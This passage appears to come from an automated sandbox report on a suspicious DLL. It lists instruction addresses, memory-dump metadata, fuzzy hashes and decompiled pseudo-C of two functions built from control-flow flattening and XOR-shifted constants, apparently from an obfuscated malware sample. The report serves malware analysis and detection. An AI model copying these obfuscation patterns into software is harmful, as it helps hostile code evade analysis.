                                                                                                                                                                            0x02f68aaf
                                                                                                                                                                            0x02f68aa9
                                                                                                                                                                            0x02f68a85
                                                                                                                                                                            0x02f68a7d
                                                                                                                                                                            0x02f68a75
                                                                                                                                                                            0x02f68a69
                                                                                                                                                                            0x02f68a5d
                                                                                                                                                                            0x02f68b92
                                                                                                                                                                            0x02f68b9d
                                                                                                                                                                            0x02f68b9d
                                                                                                                                                                            0x02f68b4c
                                                                                                                                                                            0x02f68b51
                                                                                                                                                                            0x02f68b54
                                                                                                                                                                            0x02f68b56
                                                                                                                                                                            0x02f68b62
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f68b58
                                                                                                                                                                            0x02f68b58
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f68b58
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f68b67
                                                                                                                                                                            0x02f68b67
                                                                                                                                                                            0x02f68b67
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $P$>_)$Eh}$\:$d%$i*
                                                                                                                                                                            • API String ID: 0-2969320698
                                                                                                                                                                            • Opcode ID: aeffe686daea30544195ed0138f6e4945c8625af026a6e1ad50bc3102dfd4890
                                                                                                                                                                            • Instruction ID: 9e2fa0514287593ed259becef20e2a66ea6e983e9660b932172297ace0f15ab4
                                                                                                                                                                            • Opcode Fuzzy Hash: aeffe686daea30544195ed0138f6e4945c8625af026a6e1ad50bc3102dfd4890
                                                                                                                                                                            • Instruction Fuzzy Hash: 979135715083429FD758CF61D98992BBBF1EBC4788F00891DF69696260D3B6DA09CF83
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                            			E02F5BFBE(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                            				signed int _v4;
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                            				void* _t131;
                                                                                                                                                                            				signed int _t135;
                                                                                                                                                                            				signed int _t139;
                                                                                                                                                                            				void* _t143;
                                                                                                                                                                            				void* _t146;
                                                                                                                                                                            				void* _t157;
                                                                                                                                                                            				signed int _t158;
                                                                                                                                                                            				signed int _t159;
                                                                                                                                                                            				void* _t161;
                                                                                                                                                                            				signed int* _t163;
                                                                                                                                                                            
                                                                                                                                                                            				_t144 = _a4;
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_t161 = __edx;
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				E02F6FE29(_t131);
                                                                                                                                                                            				_v56 = 0x2e7fee;
                                                                                                                                                                            				_t163 =  &(( &_v68)[4]);
                                                                                                                                                                            				_v56 = _v56 | 0x8bf0d90c;
                                                                                                                                                                            				_v56 = _v56 + 0xffff841c;
                                                                                                                                                                            				_t157 = 0;
                                                                                                                                                                            				_v56 = _v56 ^ 0x8bfe8408;
                                                                                                                                                                            				_t146 = 0xe8f06a4;
                                                                                                                                                                            				_v20 = 0xd3cae8;
                                                                                                                                                                            				_v20 = _v20 + 0xffff2712;
                                                                                                                                                                            				_v20 = _v20 ^ 0x00d2f1ea;
                                                                                                                                                                            				_v16 = 0xd3a0fd;
                                                                                                                                                                            				_t158 = 0x75;
                                                                                                                                                                            				_v16 = _v16 / _t158;
                                                                                                                                                                            				_v16 = _v16 ^ 0x4001cf0d;
                                                                                                                                                                            				_v40 = 0x4f1d62;
                                                                                                                                                                            				_v40 = _v40 + 0xffffc4cc;
                                                                                                                                                                            				_v40 = _v40 + 0xffffbca6;
                                                                                                                                                                            				_v40 = _v40 ^ 0x004e2d6a;
                                                                                                                                                                            				_v8 = 0x24ed33;
                                                                                                                                                                            				_v8 = _v8 << 7;
                                                                                                                                                                            				_v8 = _v8 ^ 0x1279d784;
                                                                                                                                                                            				_v12 = 0xe170a7;
                                                                                                                                                                            				_t135 = _v12;
                                                                                                                                                                            				_t159 = 0x28;
                                                                                                                                                                            				_t155 = _t135 % _t159;
                                                                                                                                                                            				_v12 = _t135 / _t159;
                                                                                                                                                                            				_v12 = _v12 ^ 0x0006bc2e;
                                                                                                                                                                            				_v44 = 0x4d8c8f;
                                                                                                                                                                            				_v44 = _v44 | 0xffeffd4f;
                                                                                                                                                                            				_v44 = _v44 ^ 0xffe079b2;
                                                                                                                                                                            				_v48 = 0xc3edaa;
                                                                                                                                                                            				_v48 = _v48 >> 0x10;
                                                                                                                                                                            				_v48 = _v48 + 0xd49e;
                                                                                                                                                                            				_v48 = _v48 ^ 0x0004c7fe;
                                                                                                                                                                            				_v68 = 0x67444f;
                                                                                                                                                                            				_v68 = _v68 + 0x90d;
                                                                                                                                                                            				_v68 = _v68 * 0x5b;
                                                                                                                                                                            				_v68 = _v68 | 0x263824b0;
                                                                                                                                                                            				_v68 = _v68 ^ 0x26bf9150;
                                                                                                                                                                            				_v52 = 0xb09b3a;
                                                                                                                                                                            				_v52 = _v52 ^ 0xfa5715e4;
                                                                                                                                                                            				_v52 = _v52 ^ 0xfae78c15;
                                                                                                                                                                            				_v24 = 0xeb1207;
                                                                                                                                                                            				_v24 = _v24 + 0xffffe226;
                                                                                                                                                                            				_v24 = _v24 ^ 0x00e7632f;
                                                                                                                                                                            				_v28 = 0x3b6554;
                                                                                                                                                                            				_v28 = _v28 ^ 0x4e84398c;
                                                                                                                                                                            				_v28 = _v28 ^ 0x4eb32e0d;
                                                                                                                                                                            				_v60 = 0x36daca;
                                                                                                                                                                            				_v60 = _v60 ^ 0xae85a6ca;
                                                                                                                                                                            				_v60 = _v60 ^ 0x532e6d02;
                                                                                                                                                                            				_v60 = _v60 ^ 0xfd946988;
                                                                                                                                                                            				_v64 = 0xe9416a;
                                                                                                                                                                            				_v64 = _v64 >> 0xc;
                                                                                                                                                                            				_v64 = _v64 >> 1;
                                                                                                                                                                            				_v64 = _v64 ^ 0x000bb9db;
                                                                                                                                                                            				_v32 = 0xb764c3;
                                                                                                                                                                            				_v32 = _v32 << 0xe;
                                                                                                                                                                            				_v32 = _v32 ^ 0xd93a5796;
                                                                                                                                                                            				_v4 = 0xb5f3f2;
                                                                                                                                                                            				_v4 = _v4 ^ 0xf880d4e7;
                                                                                                                                                                            				_v4 = _v4 ^ 0xf834d19c;
                                                                                                                                                                            				_t160 = _v4;
                                                                                                                                                                            				_v36 = 0x2d4acf;
                                                                                                                                                                            				_v36 = _v36 | 0x966edff9;
                                                                                                                                                                            				_v36 = _v36 ^ 0x966c13d3;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t146 != 0x2926179) {
                                                                                                                                                                            						if(_t146 == 0x8f0c602) {
                                                                                                                                                                            							E02F71538(_v4, _v36, _t160);
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t146 == 0xb296bf4) {
                                                                                                                                                                            								_t143 = E02F6C41A(_v24, _t155, _v28,  *_t144, _v60, _t160, _t144 + 4, _v64, _v32,  *((intOrPtr*)(_t144 + 4)));
                                                                                                                                                                            								_t163 =  &(_t163[8]);
                                                                                                                                                                            								_t157 = _t143;
                                                                                                                                                                            								_t146 = 0x8f0c602;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t146 != 0xe8f06a4) {
                                                                                                                                                                            									goto L10;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t146 = 0x2926179;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L13:
                                                                                                                                                                            						return _t157;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t155 = _v40;
                                                                                                                                                                            					_t139 = E02F745CA(_t161, _v40, _t146, _t146, _v8, _v12, _v44, _v16, _v48, _v68, _v20, _v52, _v56, 0);
                                                                                                                                                                            					_t160 = _t139;
                                                                                                                                                                            					_t163 =  &(_t163[0xc]);
                                                                                                                                                                            					if(_t139 == 0xffffffff) {
                                                                                                                                                                            						_t146 = 0xe2d92d;
                                                                                                                                                                            						goto L10;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t146 = 0xb296bf4;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L13;
                                                                                                                                                                            					L10:
                                                                                                                                                                            				} while (_t146 != 0xe2d92d);
                                                                                                                                                                            				goto L13;
                                                                                                                                                                            			}































                                                                                                                                                                            0x02f5bfc2
                                                                                                                                                                            0x02f5bfc9
                                                                                                                                                                            0x02f5bfcd
                                                                                                                                                                            0x02f5bfcf
                                                                                                                                                                            0x02f5bfd0
                                                                                                                                                                            0x02f5bfd2
                                                                                                                                                                            0x02f5bfd7
                                                                                                                                                                            0x02f5bfdf
                                                                                                                                                                            0x02f5bfe2
                                                                                                                                                                            0x02f5bfec
                                                                                                                                                                            0x02f5bff4
                                                                                                                                                                            0x02f5bff6
                                                                                                                                                                            0x02f5bffe
                                                                                                                                                                            0x02f5c003
                                                                                                                                                                            0x02f5c00b
                                                                                                                                                                            0x02f5c013
                                                                                                                                                                            0x02f5c01b
                                                                                                                                                                            0x02f5c029
                                                                                                                                                                            0x02f5c02e
                                                                                                                                                                            0x02f5c034
                                                                                                                                                                            0x02f5c03c
                                                                                                                                                                            0x02f5c044
                                                                                                                                                                            0x02f5c04c
                                                                                                                                                                            0x02f5c054
                                                                                                                                                                            0x02f5c05c
                                                                                                                                                                            0x02f5c064
                                                                                                                                                                            0x02f5c069
                                                                                                                                                                            0x02f5c071
                                                                                                                                                                            0x02f5c079
                                                                                                                                                                            0x02f5c07d
                                                                                                                                                                            0x02f5c07e
                                                                                                                                                                            0x02f5c080
                                                                                                                                                                            0x02f5c084
                                                                                                                                                                            0x02f5c08c
                                                                                                                                                                            0x02f5c094
                                                                                                                                                                            0x02f5c09c
                                                                                                                                                                            0x02f5c0a4
                                                                                                                                                                            0x02f5c0ac
                                                                                                                                                                            0x02f5c0b1
                                                                                                                                                                            0x02f5c0b9
                                                                                                                                                                            0x02f5c0c1
                                                                                                                                                                            0x02f5c0c9
                                                                                                                                                                            0x02f5c0d6
                                                                                                                                                                            0x02f5c0da
                                                                                                                                                                            0x02f5c0e2
                                                                                                                                                                            0x02f5c0ea
                                                                                                                                                                            0x02f5c0fa
                                                                                                                                                                            0x02f5c102
                                                                                                                                                                            0x02f5c10a
                                                                                                                                                                            0x02f5c112
                                                                                                                                                                            0x02f5c11a
                                                                                                                                                                            0x02f5c122
                                                                                                                                                                            0x02f5c12a
                                                                                                                                                                            0x02f5c132
                                                                                                                                                                            0x02f5c13a
                                                                                                                                                                            0x02f5c142
                                                                                                                                                                            0x02f5c14a
                                                                                                                                                                            0x02f5c152
                                                                                                                                                                            0x02f5c15a
                                                                                                                                                                            0x02f5c162
                                                                                                                                                                            0x02f5c167
                                                                                                                                                                            0x02f5c16b
                                                                                                                                                                            0x02f5c173
                                                                                                                                                                            0x02f5c17b
                                                                                                                                                                            0x02f5c180
                                                                                                                                                                            0x02f5c188
                                                                                                                                                                            0x02f5c190
                                                                                                                                                                            0x02f5c198
                                                                                                                                                                            0x02f5c1a0
                                                                                                                                                                            0x02f5c1a4
                                                                                                                                                                            0x02f5c1ac
                                                                                                                                                                            0x02f5c1b4
                                                                                                                                                                            0x02f5c1bc
                                                                                                                                                                            0x02f5c1bc
                                                                                                                                                                            0x02f5c1ca
                                                                                                                                                                            0x02f5c27c
                                                                                                                                                                            0x02f5c1d0
                                                                                                                                                                            0x02f5c1d6
                                                                                                                                                                            0x02f5c208
                                                                                                                                                                            0x02f5c20d
                                                                                                                                                                            0x02f5c210
                                                                                                                                                                            0x02f5c212
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5c1d8
                                                                                                                                                                            0x02f5c1de
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5c1e4
                                                                                                                                                                            0x02f5c1e4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5c1e4
                                                                                                                                                                            0x02f5c1de
                                                                                                                                                                            0x02f5c1d6
                                                                                                                                                                            0x02f5c282
                                                                                                                                                                            0x02f5c28b
                                                                                                                                                                            0x02f5c28b
                                                                                                                                                                            0x02f5c23f
                                                                                                                                                                            0x02f5c247
                                                                                                                                                                            0x02f5c24c
                                                                                                                                                                            0x02f5c24e
                                                                                                                                                                            0x02f5c254
                                                                                                                                                                            0x02f5c260
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5c256
                                                                                                                                                                            0x02f5c256
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5c256
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5c265
                                                                                                                                                                            0x02f5c265
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: /c$3$$ODg$Te;$j-N$jA
                                                                                                                                                                            • API String ID: 0-1439100758
                                                                                                                                                                            • Opcode ID: 6beecac5511420f763a8f2b06641e78c47f08b7496e3c8d03a53748897a012dd
                                                                                                                                                                            • Instruction ID: e80955b91b6b0445b1d390e3967ca6ad72d2dfccb13d85a5cca4c08dc7d192a9
                                                                                                                                                                            • Opcode Fuzzy Hash: 6beecac5511420f763a8f2b06641e78c47f08b7496e3c8d03a53748897a012dd
                                                                                                                                                                            • Instruction Fuzzy Hash: 746134724183409FC398CFA5D89A81BBFE1FBC5758F405A1DF6D696260C3B58A09CF92
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                            			E02F62142() {
                                                                                                                                                                            				signed int _v4;
                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				unsigned int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				unsigned int _v104;
                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                            				signed int _v116;
                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                            				signed int _v124;
                                                                                                                                                                            				signed int _v128;
                                                                                                                                                                            				signed int _v132;
                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                            				signed int _v140;
                                                                                                                                                                            				signed int _v144;
                                                                                                                                                                            				signed int _v148;
                                                                                                                                                                            				signed int _v152;
                                                                                                                                                                            				signed int _v156;
                                                                                                                                                                            				signed int _v160;
                                                                                                                                                                            				void* _t368;
                                                                                                                                                                            				intOrPtr _t378;
                                                                                                                                                                            				intOrPtr _t383;
                                                                                                                                                                            				intOrPtr _t384;
                                                                                                                                                                            				intOrPtr _t389;
                                                                                                                                                                            				void* _t390;
                                                                                                                                                                            				void* _t391;
                                                                                                                                                                            				signed int _t393;
                                                                                                                                                                            				signed int _t394;
                                                                                                                                                                            				signed int _t395;
                                                                                                                                                                            				signed int _t396;
                                                                                                                                                                            				signed int _t397;
                                                                                                                                                                            				signed int _t398;
                                                                                                                                                                            				signed int _t399;
                                                                                                                                                                            				signed int _t400;
                                                                                                                                                                            				signed int _t401;
                                                                                                                                                                            				signed int _t402;
                                                                                                                                                                            				signed int _t403;
                                                                                                                                                                            				intOrPtr _t438;
                                                                                                                                                                            				intOrPtr _t439;
                                                                                                                                                                            				intOrPtr _t441;
                                                                                                                                                                            				void* _t444;
                                                                                                                                                                            				signed int _t446;
                                                                                                                                                                            				signed int* _t448;
                                                                                                                                                                            
                                                                                                                                                                            				_t448 =  &_v160;
                                                                                                                                                                            				_v16 = 0x961399;
                                                                                                                                                                            				_v12 = 0x301936;
                                                                                                                                                                            				_v8 = 0xe566e6;
                                                                                                                                                                            				_t391 = 0;
                                                                                                                                                                            				_t444 = 0x374f925;
                                                                                                                                                                            				_v4 = _v4 & 0;
                                                                                                                                                                            				_v108 = 0x7426fd;
                                                                                                                                                                            				_v108 = _v108 + 0xfffff8c3;
                                                                                                                                                                            				_t393 = 0x2b;
                                                                                                                                                                            				_push("true");
                                                                                                                                                                            				_v108 = _v108 / _t393;
                                                                                                                                                                            				_v108 = _v108 ^ 0x0002b357;
                                                                                                                                                                            				_v156 = 0x38452;
                                                                                                                                                                            				_v156 = _v156 + 0x4117;
                                                                                                                                                                            				_pop(_t394);
                                                                                                                                                                            				_v156 = _v156 * 0x30;
                                                                                                                                                                            				_v156 = _v156 + 0xffff7c1f;
                                                                                                                                                                            				_v156 = _v156 ^ 0x00b47fcf;
                                                                                                                                                                            				_v152 = 0x5ef941;
                                                                                                                                                                            				_v152 = _v152 * 0x43;
                                                                                                                                                                            				_v152 = _v152 >> 7;
                                                                                                                                                                            				_v152 = _v152 << 6;
                                                                                                                                                                            				_v152 = _v152 ^ 0x0c6d9e00;
                                                                                                                                                                            				_v120 = 0x18b538;
                                                                                                                                                                            				_v120 = _v120 * 0x11;
                                                                                                                                                                            				_v120 = _v120 + 0xffffc33e;
                                                                                                                                                                            				_v120 = _v120 >> 0xd;
                                                                                                                                                                            				_v120 = _v120 ^ 0x00000d1e;
                                                                                                                                                                            				_v112 = 0x5e5e29;
                                                                                                                                                                            				_v112 = _v112 + 0x9b22;
                                                                                                                                                                            				_v112 = _v112 / _t394;
                                                                                                                                                                            				_v112 = _v112 ^ 0x0002e0c4;
                                                                                                                                                                            				_v144 = 0x808e79;
                                                                                                                                                                            				_v144 = _v144 | 0xf9cc6bdf;
                                                                                                                                                                            				_v144 = _v144 + 0xffff3e00;
                                                                                                                                                                            				_v144 = _v144 << 0xf;
                                                                                                                                                                            				_v144 = _v144 ^ 0x16ff716d;
                                                                                                                                                                            				_v28 = 0xba41b5;
                                                                                                                                                                            				_v28 = _v28 + 0xffffb1dd;
                                                                                                                                                                            				_v28 = _v28 ^ 0x00b49e8e;
                                                                                                                                                                            				_v68 = 0x38cb33;
                                                                                                                                                                            				_v68 = _v68 >> 2;
                                                                                                                                                                            				_v68 = _v68 ^ 0x000b8367;
                                                                                                                                                                            				_v44 = 0xd85990;
                                                                                                                                                                            				_v44 = _v44 ^ 0x9ad510f8;
                                                                                                                                                                            				_v44 = _v44 ^ 0x9a039936;
                                                                                                                                                                            				_v104 = 0xf87474;
                                                                                                                                                                            				_t395 = 0x22;
                                                                                                                                                                            				_v104 = _v104 / _t395;
                                                                                                                                                                            				_v104 = _v104 >> 7;
                                                                                                                                                                            				_v104 = _v104 ^ 0x000753f7;
                                                                                                                                                                            				_v36 = 0x3be84a;
                                                                                                                                                                            				_v36 = _v36 << 6;
                                                                                                                                                                            				_v36 = _v36 ^ 0x0ef6677c;
                                                                                                                                                                            				_v128 = 0x4404d4;
                                                                                                                                                                            				_v128 = _v128 ^ 0xb10c689b;
                                                                                                                                                                            				_t396 = 0x5e;
                                                                                                                                                                            				_v128 = _v128 / _t396;
                                                                                                                                                                            				_v128 = _v128 ^ 0x298e6a61;
                                                                                                                                                                            				_v128 = _v128 ^ 0x28610484;
                                                                                                                                                                            				_v80 = 0xdf65bd;
                                                                                                                                                                            				_t397 = 0x7c;
                                                                                                                                                                            				_v80 = _v80 / _t397;
                                                                                                                                                                            				_v80 = _v80 ^ 0x00023fe8;
                                                                                                                                                                            				_v96 = 0x7747b3;
                                                                                                                                                                            				_v96 = _v96 << 0xd;
                                                                                                                                                                            				_t398 = 0x29;
                                                                                                                                                                            				_v96 = _v96 * 0x16;
                                                                                                                                                                            				_v96 = _v96 ^ 0x052c7385;
                                                                                                                                                                            				_v88 = 0xae51fb;
                                                                                                                                                                            				_v88 = _v88 + 0x359a;
                                                                                                                                                                            				_v88 = _v88 | 0x8b717ce6;
                                                                                                                                                                            				_v88 = _v88 ^ 0x8bfa7840;
                                                                                                                                                                            				_v24 = 0xcaf683;
                                                                                                                                                                            				_v24 = _v24 >> 7;
                                                                                                                                                                            				_v24 = _v24 ^ 0x00013e33;
                                                                                                                                                                            				_v52 = 0xefed62;
                                                                                                                                                                            				_v52 = _v52 | 0x058c509b;
                                                                                                                                                                            				_v52 = _v52 ^ 0x05e11655;
                                                                                                                                                                            				_v160 = 0xbd94ea;
                                                                                                                                                                            				_v160 = _v160 + 0x2a3a;
                                                                                                                                                                            				_v160 = _v160 >> 5;
                                                                                                                                                                            				_v160 = _v160 + 0x96e3;
                                                                                                                                                                            				_v160 = _v160 ^ 0x0003401d;
                                                                                                                                                                            				_v72 = 0x73d84b;
                                                                                                                                                                            				_v72 = _v72 + 0x3d83;
                                                                                                                                                                            				_v72 = _v72 ^ 0x007dedc2;
                                                                                                                                                                            				_v76 = 0xd9453f;
                                                                                                                                                                            				_v76 = _v76 >> 1;
                                                                                                                                                                            				_v76 = _v76 ^ 0x006ac7af;
                                                                                                                                                                            				_v140 = 0x85d58e;
                                                                                                                                                                            				_v140 = _v140 * 0x2c;
                                                                                                                                                                            				_v140 = _v140 >> 4;
                                                                                                                                                                            				_v140 = _v140 / _t398;
                                                                                                                                                                            				_v140 = _v140 ^ 0x000cf91a;
                                                                                                                                                                            				_v100 = 0x1458f8;
                                                                                                                                                                            				_v100 = _v100 ^ 0xd74f5ef9;
                                                                                                                                                                            				_t399 = 0x5f;
                                                                                                                                                                            				_v100 = _v100 / _t399;
                                                                                                                                                                            				_v100 = _v100 ^ 0x0247f1d9;
                                                                                                                                                                            				_v64 = 0x476ab5;
                                                                                                                                                                            				_v64 = _v64 + 0xffff3492;
                                                                                                                                                                            				_v64 = _v64 ^ 0x004c13d1;
                                                                                                                                                                            				_v148 = 0x4dca07;
                                                                                                                                                                            				_v148 = _v148 + 0xffff4a4e;
                                                                                                                                                                            				_v148 = _v148 + 0xffff2093;
                                                                                                                                                                            				_v148 = _v148 ^ 0x004c8279;
                                                                                                                                                                            				_v136 = 0xa6ed90;
                                                                                                                                                                            				_v136 = _v136 >> 2;
                                                                                                                                                                            				_v136 = _v136 | 0x950d13bb;
                                                                                                                                                                            				_v136 = _v136 >> 0xf;
                                                                                                                                                                            				_v136 = _v136 ^ 0x000e92a5;
                                                                                                                                                                            				_v60 = 0xea20ae;
                                                                                                                                                                            				_v60 = _v60 * 0x5d;
                                                                                                                                                                            				_v60 = _v60 ^ 0x550aff98;
                                                                                                                                                                            				_v92 = 0xe3a2d4;
                                                                                                                                                                            				_v92 = _v92 >> 6;
                                                                                                                                                                            				_v92 = _v92 * 0x28;
                                                                                                                                                                            				_v92 = _v92 ^ 0x008d85d0;
                                                                                                                                                                            				_v132 = 0x9d5db8;
                                                                                                                                                                            				_v132 = _v132 + 0xffff1bd6;
                                                                                                                                                                            				_t400 = 0x1b;
                                                                                                                                                                            				_v132 = _v132 / _t400;
                                                                                                                                                                            				_v132 = _v132 << 0xa;
                                                                                                                                                                            				_v132 = _v132 ^ 0x17217366;
                                                                                                                                                                            				_v56 = 0xa7c0ff;
                                                                                                                                                                            				_t401 = 0x35;
                                                                                                                                                                            				_v56 = _v56 / _t401;
                                                                                                                                                                            				_v56 = _v56 ^ 0x000623f9;
                                                                                                                                                                            				_v116 = 0xf9a70;
                                                                                                                                                                            				_v116 = _v116 >> 0xa;
                                                                                                                                                                            				_v116 = _v116 >> 5;
                                                                                                                                                                            				_v116 = _v116 + 0xffffd532;
                                                                                                                                                                            				_v116 = _v116 ^ 0xfff34a0b;
                                                                                                                                                                            				_v124 = 0xd1e957;
                                                                                                                                                                            				_v124 = _v124 << 3;
                                                                                                                                                                            				_t402 = 0x76;
                                                                                                                                                                            				_v124 = _v124 / _t402;
                                                                                                                                                                            				_v124 = _v124 + 0x1a27;
                                                                                                                                                                            				_v124 = _v124 ^ 0x000dfee3;
                                                                                                                                                                            				_v84 = 0x8b01d8;
                                                                                                                                                                            				_t403 = 0x34;
                                                                                                                                                                            				_v84 = _v84 * 0x70;
                                                                                                                                                                            				_v84 = _v84 / _t403;
                                                                                                                                                                            				_v84 = _v84 ^ 0x0120e28f;
                                                                                                                                                                            				_v32 = 0xcb988c;
                                                                                                                                                                            				_v32 = _v32 ^ 0x945cb942;
                                                                                                                                                                            				_v32 = _v32 ^ 0x9495c850;
                                                                                                                                                                            				_v40 = 0x79d8e1;
                                                                                                                                                                            				_v40 = _v40 >> 9;
                                                                                                                                                                            				_v40 = _v40 ^ 0x000c7724;
                                                                                                                                                                            				_v48 = 0xc03196;
                                                                                                                                                                            				_v48 = _v48 ^ 0x1279a3f1;
                                                                                                                                                                            				_v48 = _v48 ^ 0x12baef9a;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					_t368 = 0x9ae396c;
                                                                                                                                                                            					do {
                                                                                                                                                                            						L2:
                                                                                                                                                                            						if(_t444 == 0x19911bc) {
                                                                                                                                                                            							_push(_v52);
                                                                                                                                                                            							_push(_v24);
                                                                                                                                                                            							_push(_v88);
                                                                                                                                                                            							_t446 = E02F6E1F8(0x2f51a20, _v96, __eflags);
                                                                                                                                                                            							__eflags = E02F5738A(_v160, _t446, _v72, _v108,  &_v20, 0, _v76) - _v156;
                                                                                                                                                                            							_t403 = _t446;
                                                                                                                                                                            							_t444 =  ==  ? 0x9ae396c : 0x7737a40;
                                                                                                                                                                            							E02F6FECB(_t403, _v140, _v100, _v64, _v148);
                                                                                                                                                                            							_t448 =  &(_t448[0xb]);
                                                                                                                                                                            							_t368 = 0x9ae396c;
                                                                                                                                                                            							goto L12;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t444 == 0x374f925) {
                                                                                                                                                                            							_push(_t403);
                                                                                                                                                                            							_push(_t403);
                                                                                                                                                                            							_t378 = E02F5C5D8(0x44);
                                                                                                                                                                            							 *0x2f76220 = _t378;
                                                                                                                                                                            							 *((intOrPtr*)(_t378 + 0x28)) = 0x4000;
                                                                                                                                                                            							_t383 =  *0x2f76220; // 0x0
                                                                                                                                                                            							_t384 = E02F5C5D8( *((intOrPtr*)(_t383 + 0x28)));
                                                                                                                                                                            							_t438 =  *0x2f76220; // 0x0
                                                                                                                                                                            							_t448 =  &(_t448[4]);
                                                                                                                                                                            							_t444 = 0x19911bc;
                                                                                                                                                                            							_t403 =  *((intOrPtr*)(_t438 + 0x28)) + _t384;
                                                                                                                                                                            							 *((intOrPtr*)(_t438 + 0x24)) = _t384;
                                                                                                                                                                            							 *((intOrPtr*)(_t438 + 0x14)) = _t384;
                                                                                                                                                                            							 *((intOrPtr*)(_t438 + 0x1c)) = _t384;
                                                                                                                                                                            							 *(_t438 + 0x20) = _t403;
                                                                                                                                                                            							while(1) {
                                                                                                                                                                            								L1:
                                                                                                                                                                            								_t368 = 0x9ae396c;
                                                                                                                                                                            								goto L2;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t444 == 0x7737a40) {
                                                                                                                                                                            							_t439 =  *0x2f76220; // 0x0
                                                                                                                                                                            							E02F72B09(_v116,  *((intOrPtr*)(_t439 + 0x24)), _v124, _v84);
                                                                                                                                                                            							_t441 =  *0x2f76220; // 0x0
                                                                                                                                                                            							E02F72B09(_v32, _t441, _v40, _v48);
                                                                                                                                                                            							L16:
                                                                                                                                                                            							return _t391;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t444 == 0x9042860) {
                                                                                                                                                                            							E02F5F7FE(_v132, _v20, _v56, _v112);
